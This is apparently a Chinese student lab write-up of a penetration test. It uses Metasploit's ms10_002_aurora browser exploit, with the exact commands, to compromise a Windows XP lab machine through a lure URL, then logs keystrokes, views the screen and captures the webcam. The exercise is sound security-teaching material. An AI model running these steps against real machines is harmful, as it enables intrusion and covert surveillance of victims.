云安全试验二

渗透试验二

查看kali的IP地址

搜索漏洞
msf > search ms10-002

msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > set srvhost 192.168.4.109
msf exploit(ms10_002_aurora) > set lhost 192.168.4.109
msf exploit(ms10_002_aurora) > set uripath aurora.html

这里的srvhost、lhost地址都是kali的IP地址
exploit
得到诱导的URL

在XP主机内输入诱导的URL地址

弹出消息，显示XP主机已经点击了这个链接

sessions –i 1
进入可以调用功能的模式

用run命令查看有哪些功能可以调用

功能调用——记录键盘的输入

在XP系统内随便输入

新打开一个窗口，用cat命令查看文件内容

功能调用——查看屏幕

根据不同的网络情况，可能会有延迟，但是确实能看看到XP主机的屏幕

功能调用——调用摄像头

输入命令

然后就看到了摄像头上的手机壳，哈哈哈。

----------------------------------------------------完成---------------------------------------------------